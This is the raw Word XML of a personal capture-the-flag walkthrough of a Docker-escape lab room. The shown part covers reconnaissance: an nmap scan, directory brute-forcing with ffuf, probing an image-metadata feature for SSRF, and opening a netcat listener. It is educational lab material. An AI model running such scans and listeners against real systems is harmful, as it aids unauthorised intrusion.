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D74F4" w14:textId="0841DADD" w:rsidR="00B111AC" w:rsidRPr="008A1424" w:rsidRDefault="0067745B" w:rsidP="008A1424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8A1424">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>THE GREAT ESCAPE WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61761657" w14:textId="0A440171" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DF80CDC" w14:textId="77777777" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76B2360C" w14:textId="77777777" w:rsidR="00911E39" w:rsidRDefault="0067745B" w:rsidP="00352F45">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This room personally took me down a large learning path with regards to Docker. This is my first docker room where I had some idea of what was going on; thanks to THM room, Docker Rodeo. This room </w:t>
      </w:r>
      <w:r w:rsidR="00F105FC">
        <w:t>gices space to practice SSRF, Command Injection</w:t>
      </w:r>
      <w:r w:rsidR="008A1424">
        <w:t>, git</w:t>
      </w:r>
      <w:r w:rsidR="00F105FC">
        <w:t xml:space="preserve"> and</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Docker escapes along with </w:t>
      </w:r>
      <w:r w:rsidR="00F105FC">
        <w:t xml:space="preserve">visiting some security </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5629131A" w14:textId="2023AFF7" w:rsidR="00F105FC" w:rsidRDefault="00F105FC" w:rsidP="00352F45">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">configurations that administrators may apply. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1422529A" w14:textId="03C79672" w:rsidR="00911E39" w:rsidRDefault="00911E39" w:rsidP="00352F45">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE3453E" w14:textId="77777777" w:rsidR="00911E39" w:rsidRPr="002D3A59" w:rsidRDefault="00911E39" w:rsidP="00352F45">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FCC194F" w14:textId="2DD067B7" w:rsidR="00911E39" w:rsidRDefault="00911E39" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2F27ACFA" w14:textId="77777777" w:rsidR="00911E39" w:rsidRDefault="00911E39" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7080C152" w14:textId="5C609B03" w:rsidR="00F105FC" w:rsidRDefault="00F105FC" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>As usual, with our assigned IP address a port scan is in order.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648573D0" w14:textId="77777777" w:rsidR="002D3A59" w:rsidRDefault="00F105FC" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127B0D7" w14:textId="1128C7CB" w:rsidR="00F105FC" w:rsidRPr="002D3A59" w:rsidRDefault="00E7469D" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">sudo </w:t>
      </w:r>
      <w:r w:rsidR="00352F45" w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00F105FC" w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">map -Pn -v -n –reason -A –disable-arp-ping -g 53 </w:t>
      </w:r>
      <w:r w:rsidR="00352F45" w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-oN Escape_Ports –version-light</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> $IP_address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE17969" w14:textId="77777777" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E883642" w14:textId="13F97E9A" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>A break-down of the flags used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD389F" w14:textId="253D4B0A" w:rsidR="00E7469D" w:rsidRDefault="00E9771A" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E7469D">
        <w:t>udo :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E7469D">
        <w:t xml:space="preserve"> run a priviledge scan making -sS the default scan type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523C27CB" w14:textId="77A04D2A" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>Pn :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> assume the host is up</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585B5C6E" w14:textId="3B109AA5" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>v :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> show more information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07097A52" w14:textId="63867C70" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>n :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do not perform name resolution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3960C767" w14:textId="4328525C" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>--</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>reason :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> state why nmap classified a port state as shown</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283570D8" w14:textId="4052991E" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>A :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> an aggressive scan includes default scripts, service version probes and OS test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CEC7846" w14:textId="2D72CD29" w:rsidR="00352F45" w:rsidRDefault="00352F45" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>--disable-arp-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ping :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> part of the </w:t>
      </w:r>
      <w:r w:rsidR="00E7469D">
        <w:t xml:space="preserve">host discovery process; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3965F373" w14:textId="13ED474E" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">-g </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>53 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> make all nmap traffic come out of port 53 (DNS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D52F90" w14:textId="021897D6" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="00352F45">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>oN :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> normal output and save as Esacape_Ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCEF314" w14:textId="1DDF64DA" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="00E7469D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t>--version-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>light :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> do a light version probe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB6359" w14:textId="27AF2048" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="00E7469D">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38C26069" w14:textId="34C2DF2B" w:rsidR="00E7469D" w:rsidRDefault="00E7469D" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Our Nmap results showed that Port 80 for HTTP and 22 for SSH are running but </w:t>
      </w:r>
      <w:r w:rsidR="003C1E85">
        <w:t>SSH probes /scan is producing results that are unusual; more on this later. Navigating to the webpage</w:t>
      </w:r>
      <w:r w:rsidR="008353D4">
        <w:t xml:space="preserve"> – Photo Classrom -</w:t>
      </w:r>
      <w:r w:rsidR="003C1E85">
        <w:t xml:space="preserve"> we see it is a platform that seems to promot</w:t>
      </w:r>
      <w:r w:rsidR="008353D4">
        <w:t>es photography</w:t>
      </w:r>
      <w:r w:rsidR="003C1E85">
        <w:t xml:space="preserve">. Maybe a file upload attack vector? </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7528EA0F" w14:textId="3DA84240" w:rsidR="008A1424" w:rsidRDefault="008A1424" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B027460" w14:textId="415CD998" w:rsidR="008A1424" w:rsidRPr="008353D4" w:rsidRDefault="008A1424" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Enumerating the </w:t>
      </w:r>
      <w:r w:rsidR="00911E39">
        <w:t>webpage,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> we find Signup feature that has been disabled. A Login feature but we don’t have any</w:t>
      </w:r>
      <w:r w:rsidR="008353D4">
        <w:t xml:space="preserve"> valid</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> credential</w:t>
      </w:r>
      <w:r w:rsidR="008353D4">
        <w:t xml:space="preserve">s and common such as </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008353D4">
        <w:t>admin:admin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008353D4">
        <w:t xml:space="preserve"> don’t work</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The source </w:t>
      </w:r>
      <w:r w:rsidRPr="008353D4">
        <w:t>code</w:t>
      </w:r>
      <w:r w:rsidR="008353D4" w:rsidRPr="008353D4">
        <w:t xml:space="preserve"> doesn’t have anything interesting either. Our Nmap script for HTTP showed a robots.txt file that contains </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1B0AC8" w14:textId="734EDAC9" w:rsidR="008353D4" w:rsidRDefault="008353D4" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="008353D4">
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>api/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4731D1E8" w14:textId="652AF941" w:rsidR="008353D4" w:rsidRDefault="008353D4" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>exif</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>-util</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A50AE9" w14:textId="720C0A24" w:rsidR="008353D4" w:rsidRDefault="008353D4" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>/*.bak.txt$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EDF06D" w14:textId="0D2D6E6D" w:rsidR="008353D4" w:rsidRDefault="008353D4" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3600D97F" w14:textId="3E10B263" w:rsidR="000B3846" w:rsidRDefault="008353D4" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The Api end point we see in the request when we try and login in with common credentials – </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>admin:admin.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Lets see what the exif-util is hiding. It contains a hidden feature; maybe still in development. It allows users to upload</w:t>
      </w:r>
      <w:r w:rsidR="0013115D">
        <w:t xml:space="preserve"> images and shows their meta-data. Files can be uploaded directly or using a URL. There doesn’t seem an ability to upload shells or any other </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>arbitrary</w:t>
      </w:r>
      <w:r w:rsidR="0013115D">
        <w:t xml:space="preserve"> files. We test the URL feature and it does work. </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>Let’s</w:t>
      </w:r>
      <w:r w:rsidR="0013115D">
        <w:t xml:space="preserve"> test for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="0013115D">
        <w:t>Server Side</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0013115D">
        <w:t xml:space="preserve"> Request Forgery. Before going down this path we can brute-force for any hidden files/ directories using ffuf/gobuster etc.</w:t>
      </w:r>
      <w:r w:rsidR="000B3846">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D0F9D63" w14:textId="77777777" w:rsidR="000B3846" w:rsidRDefault="000B3846" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA35E52" w14:textId="77777777" w:rsidR="00E9771A" w:rsidRDefault="00E9771A" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6172EE8D" w14:textId="77777777" w:rsidR="00E9771A" w:rsidRDefault="00E9771A" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7533EF96" w14:textId="77777777" w:rsidR="00E9771A" w:rsidRDefault="00E9771A" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C775E90" w14:textId="11368FB6" w:rsidR="000B3846" w:rsidRPr="002D3A59" w:rsidRDefault="000B3846" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">ffuf -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="002D3A59">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="auto"/>
          </w:rPr>
          <w:t>http://docker-escape.thm/FUZZ -w directory-medium-list-2.3.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> -c -ac [ optional filter out any </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>results ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E639536" w14:textId="77777777" w:rsidR="000B3846" w:rsidRDefault="000B3846" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29385FC3" w14:textId="77777777" w:rsidR="000B3846" w:rsidRPr="002D3A59" w:rsidRDefault="000B3846" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-u the url to brute-force against</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB6FF4A" w14:textId="77777777" w:rsidR="000B3846" w:rsidRPr="002D3A59" w:rsidRDefault="000B3846" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>c :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> color the output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0865D9FE" w14:textId="77777777" w:rsidR="000B3846" w:rsidRPr="002D3A59" w:rsidRDefault="000B3846" w:rsidP="002D3A59">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>ac :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> auto-calibration [sometimes messes up scans so optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CC977F" w14:textId="77777777" w:rsidR="000B3846" w:rsidRDefault="000B3846" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F2037F" w14:textId="7369E6B6" w:rsidR="008353D4" w:rsidRDefault="000B3846" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:softHyphen/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:noBreakHyphen/>
      </w:r>
      <w:r>
        <w:t>We notice that no results are being found and it looks like the system has been configured with a rate-limiting security measure meaning brute-forcing is out of the options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F30873" w14:textId="1617BD06" w:rsidR="0013115D" w:rsidRDefault="0013115D" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5093FB94" w14:textId="0E97FA45" w:rsidR="000B3846" w:rsidRDefault="000B3846" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FB472B" w14:textId="32E606BA" w:rsidR="0013115D" w:rsidRDefault="0013115D" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9CD9B3" w14:textId="6C75089C" w:rsidR="0013115D" w:rsidRDefault="0013115D" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>We’ll carry out t</w:t>
      </w:r>
      <w:r w:rsidR="00B33EDA">
        <w:t>hree</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tests just to make sure. We </w:t>
      </w:r>
      <w:r w:rsidR="00B33EDA">
        <w:t xml:space="preserve">open a netcat listener on Port 80 on our attacking </w:t>
      </w:r>
      <w:r w:rsidR="00E9771A">
        <w:t>machine</w:t>
      </w:r>
      <w:r w:rsidR="00B33EDA">
        <w:t xml:space="preserve"> (in case there is a WAF in place or other measures blocking outbound connections on the server)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E126085" w14:textId="6B0B8555" w:rsidR="00B33EDA" w:rsidRPr="002D3A59" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="002D3A59" w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">c -lnvp 80 [ may need sudo depending on your </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>user ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002D3A59">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D997B1" w14:textId="2B9D49C1" w:rsidR="00B33EDA" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C232CAE" w14:textId="2B8630E5" w:rsidR="00B33EDA" w:rsidRDefault="00B33EDA" w:rsidP="003C1E85">
      <w:pPr>
